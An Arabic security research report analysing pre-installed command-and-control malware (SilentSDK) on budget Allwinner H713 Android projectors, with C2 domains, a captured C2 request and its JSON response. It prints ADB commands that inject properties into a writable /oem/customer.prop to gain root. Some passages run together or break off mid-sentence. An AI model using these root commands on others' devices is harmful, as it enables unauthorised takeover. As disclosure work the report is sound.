
تفكيك شبكة C2 لـ beamers الصينية - SilentSDK-Analysis
تقرير التحليل الفني — البحث الأمني
الأجهزة المتأثرة: العديد من أجهزة عرض الأندرويد من علامات تجارية مثل Nonete (مثل الطراز HY260Pro) (على الأرجح أيضًا عدة أجهزة عرض من Magcubic، Hotack، Huyukang وغيرها الكثير، حيث تقوم هذه الشركات بتوزيع نماذج مماثلة وهناك مؤشرات تدعم ذلك)
منصة المعالج: Allwinner H713 / sun50iw12p1 — قد يؤثر على جميع الأجهزة على هذه المنصة
فترة التحليل: 11–17 أبريل 2026
التصنيف: بنية تحتية للقيادة والتحكم مثبتة مسبقًا مع حمولة حصان طروادة للوصول عن بُعد
api.pixelpioneerss.com)، وتستخرج معرفات الجهاز الحساسة، ويمكنها تنزيل وتنفيذ أي كود خبيث إضافي بصلاحيات الجذر في أي وقت (chmod 777). بالإضافة إلى ذلك، تحتوي الأجهزة على أبواب خلفية مفتوحة للجذر.*.aodintech.com، api.pixelpioneerss.com، sta.smartinnovate.net) على مستوى الشبكة. يمكن للمستخدمين المتأثرين فقط تعطيل التطبيقات الخبيثة يدويًا عبر ADB، لأنها مدمجة بعمق في النظام.البنية التحتية للبرمجيات الخبيثة الموثقة في هذا التقرير مثبتة مسبقًا على أجهزة عرض أندرويد تُباع حاليًا بكميات كبيرة للمستهلكين النهائيين على Amazon وeBay وAliExpress. تشمل الأجهزة المتأثرة ربما عدة أسماء تجارية (Hotack، Huyukang، Magcubic، Nonete، من بين آخرين). تم تأكيد وجود بنية تحتية C2 متطابقة بشكل مستقل على أجهزة أخرى من نفس الشركة المصنعة (انظر القسم 13). يتطابق النمط مع حالات BADBOX.
الجهاز المشترى: رابط Amazon - جهاز عرض Nonete Mini 4K 1080P
| الخاصية | القيمة |
|---|---|
| العلامة التجارية | Nonete HY260Pro (طراز تبيعه شركات متعددة) |
| اسم الطراز الداخلي | NT10 |
| SoC | Allwinner sun50iw12p1 (ARM 32-bit) |
| نظام التشغيل | SpectraOS (Android 11, Kernel 5.4.99) |
| بصمة البناء الحقيقية | Allwinner/h713_tuna_p3/h713-tuna_p3:11 |
| بصمة البناء المزيفة | ADT-3/adt3/adt3:11/RP1A.201005.006 |
| SELinux | Permissive (بدون تطبيق) |
| مفتاح توقيع المنصة | مفتاح اختبار AOSP عام |
| شهادة OEM | CN=蓝鲨, OU=www.bsh.me, C=CN |
| قناة البرامج الثابتة | HY260Pro_SpectraOS_TPYB |
ملاحظة حول النطاق: شريحة Allwinner H713 مدمجة في العديد من أجهزة عرض الأندرويد الرخيصة التي تُباع تحت أسماء تجارية متغيرة في السوق الأوروبية. تشير قاعدة البرامج الثابتة المتطابقة (h713_tuna_p3) ومشغل C2 المتطابق (Shenzhen Aodin Technology) بقوة إلى أن جميع الأجهزة من هذا المصنع تحتوي على نفس البنية التحتية.
| الخطوة | الإجراء | النتيجة |
|---|---|---|
| 1 | التقاط حركة مرور الشبكة باستخدام Wireshark | حركة HTTP إلى store-api.aodintech.com |
| 2 | فك ترميز استجابة C2 المضغوطة بـ gzip | 7 تطبيقات، بما في ذلك "SilentTools" المخفي |
| 3 | فك تشفير مسار التنزيل باستخدام AES-CBC | المفتاح [REDACTED]، رابط إلى ملف .bpp |
| 4 | استغلال الجذر عبر /oem/customer.prop | uid=0(root) بعد حقن الخاصية |
| 5 | تفريغ جنائي لـ /data، /oem، /system | ملفات APK، قواعد بيانات، تكوينات |
| 6 | تحليل ثابت لـ StoreOS DEX | pm install -r -d، حماية عكس البايت |
| 7 | هندسة عكسية لآلية reverseLen | فهم الحماية ضد التحليل |
| 8 | كسر حماية عكس البايت | SilentSDK DEX مفكوك وقابل للتحليل |
| 9 | فك تشفير سلاسل SilentSDK باستخدام XOR | تأكيد نطاق C2 api.pixelpioneerss.com |
| 10 | التحقق من التجزئة عبر ثلاثة مصادر | MD5/SHA-256 متطابقان تمامًا |
| 11 | هندسة عكسية لعملية تنزيل البرمجية الخبيثة | الخوادم لا تزال متصلة |
| 12 | هندسة عكسية للبرمجية الخبيثة | إطار عمل RAT قائم على الإضافات |
تم تحقيق الوصول إلى الجذر من خلال مجموعة من ثلاث ثغرات:
/oem — يتم تحميل القسم كنظام FAT مع fmask=0000.customer.prop عند الإقلاع — يستبدل خصائص النظام.```bash
adb shell getenforce # Result: Permissive
adb shell ls -la /oem/ # All files world-writableadb shell 'echo "ro.debuggable=1" >> /oem/customer.prop' adb shell 'echo "service.adb.root=1" >> /oem/customer.prop' adb shell 'echo "ro.secure=0" >> /oem/customer.prop'
adb reboot && adb wait-for-device && adb root adb shell id
**التأثير:** أي مستخدم لديه وصول فعلي أو مهاجم على نفس الشبكة (عبر ADB، المنفذ 5555 مفتوح، دون مصادقة) يحصل على صلاحية الجذر الكاملة.
---
## 4. استجابة خادم C2 — الأدلة الأساسية
### طلب HTTP الملتقط```http
POST /sign/app/list HTTP/1.1
chanId: HY260Pro_SpectraOS_TPYB
timestamp: 1775904428922
sign: [REDACTED]
Content-Type: application/json;charset=UTF-8
Content-Length: 184
Host: store-api.aodintech.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/5.0.0-alpha.12
تحتوي الاستجابة المضغوطة بـ gzip على قائمة JSON تحتوي على سبعة تطبيقات. ستة منها هي تطبيقات بث عادية (YouTube، Netflix، Disney+، Prime Video، Chrome، BrowseHere). السابع هو SilentTools:
| التطبيق | الحزمة | isShow | isForce | isSilent Install | isSilent Uninstall | launch Type |
|---|---|---|---|---|---|---|
| YouTube | com.google.android.youtube.tv | true | false | false | false | 0 |
| Disney+ | com.disney.disneyplus | true | false | false | false | 0 |
| Netflix | com.netflix.mediaclient | true | false | false | false | 0 |
| Chrome | com.android.chrome | true | false | false | false | 0 |
| Prime Video | com.amazon.amazonvideo.livingroom | true | false | false | false | 0 |
| BrowseHere | com.tcl.browser | true | false | false | false | 0 |
| SilentTools | com.hotack.silentsdk | false | true | false | true | 1 |
{ "name": "SilentTools", "pkg": "com.hotack.silentsdk", "desc": "Special app", "icon": "http://cdn-store.aodintech.com/com.hotack.silentsdk/image/95630a5e-e05e-4dba-814a-cf2742585b39.png", "category": "htc", "zone": "Global", "developer": "htc", "isForce": true, "verCode": 4, "verName": "2509041614", "verDesc": "SilentSDK", "installType": 0, "appType": "apk", "reverseLen": 63995, "path": "W15UOdzUbX72/67VLbV2cMLetfnsudxCpedAqw2GjJ8pvLI56S0gTzrp4HaetoVK3PdHXvM9vw7g+F4eFGhHDNvARfeM38tkcqo7gOpulNCb1gKYE2rmjWa+6RdjhB84+g403UUicBfFf5vHDoOEgA==", "size": 2474873, "md5": "5df097591d6942bae4eff33a37c4e28f", "upDate": "2025-09-04", "isShow": false, "isSilentInstall": false, "isSilentUninstall": true, "isBootStartup": false, "launchType": 1, "launchParam": "com.hotack.silentsdk.MyService" }
**تفسير العلامات:**